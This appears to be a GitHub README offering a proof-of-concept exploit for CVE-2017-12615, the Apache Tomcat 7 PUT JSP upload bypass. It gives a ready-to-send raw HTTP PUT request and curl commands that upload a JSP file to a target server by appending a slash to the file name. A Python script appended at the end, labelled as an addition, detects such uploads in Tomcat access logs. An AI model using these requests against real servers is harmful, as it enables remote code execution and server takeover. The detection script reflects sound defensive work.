breaktoprotect/CVE-2017-12615

In memory of Chia Junyuan (https://packetstormsecurity.com/files/author/11924/)

POC CVE-2017-12615

POC Exploit for Apache Tomcat 7.0.0 to 7.0.79 running on Windows; CVE-2017-12615 PUT JSP vulnerability.

Description:

By design, Apache Tomcat does not allow JSP files to be uploaded via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} Tomcat servers that have PUT enabled by sending a specially crafted HTTP PUT request. But seriously, special? Please.

Exploit method:

By appending a '/' character after the filename's extension, one can bypass the file extension check. That's it. So, not that special actually.

Exploit as a raw HTTP request:

Request

PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

Expected response if successful

HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

Exploit using 'curl':

  1. Create a .jsp file (e.g. test.jsp):
     <% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>
  2. Perform the curl command on target server:
     curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
  3. Check if your file is uploaded by browsing to the target address or:
     curl http://target-host-or-ip-address:port/test.jsp
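
Detecting this in access logs (an added example, not part of the original repository): the script below scans Tomcat access-log lines for PUT requests whose path ends in '.jsp/' and checks whether the stored file was later served. The "common" log layout, the function name find_jsp_put_bypass and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed layout: Tomcat AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b).
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) \S+$'
)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [23/Sep/2017:06:36:36 +0000] "PUT /test.jsp/ HTTP/1.1" 201 -
198.51.100.7 - - [23/Sep/2017:06:36:41 +0000] "GET /test.jsp HTTP/1.1" 200 101
203.0.113.9 - - [23/Sep/2017:07:02:10 +0000] "PUT /probe.jsp/ HTTP/1.1" 403 -
203.0.113.9 - - [23/Sep/2017:07:02:12 +0000] "GET /probe.jsp HTTP/1.1" 404 -
192.0.2.20 - - [23/Sep/2017:08:15:00 +0000] "PUT /docs/readme.txt HTTP/1.1" 201 -
192.0.2.20 - - [23/Sep/2017:08:15:30 +0000] "GET /index.jsp HTTP/1.1" 200 512
"""


def find_jsp_put_bypass(log_text):
    """Return one finding per PUT whose path ends in '.jsp/'.

    severity: 'executed' if the stored path was later served with 200,
              'written'  if the PUT returned 201/204 but no fetch was seen,
              'attempt'  if the PUT was refused.
    """
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not in the assumed layout
        path = unquote(m["uri"].split("?", 1)[0])
        status = int(m["status"])
        if m["method"] == "PUT" and path.lower().endswith(".jsp/"):
            stored = path.rstrip("/")       # name the file is written under
            written = status in (201, 204)  # created / overwritten
            findings[stored] = {"path": stored, "client": m["host"], "time": m["ts"],
                                "severity": "written" if written else "attempt"}
        elif status == 200 and findings.get(path, {}).get("severity") == "written":
            findings[path]["severity"] = "executed"
    return list(findings.values())


if __name__ == "__main__":
    for finding in find_jsp_put_bypass(SAMPLE_LOG):
        print(finding)
```

A finding with severity 'executed' means the upload was accepted and the JSP was then served; 'attempt' entries show the request was refused but are still worth reviewing.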
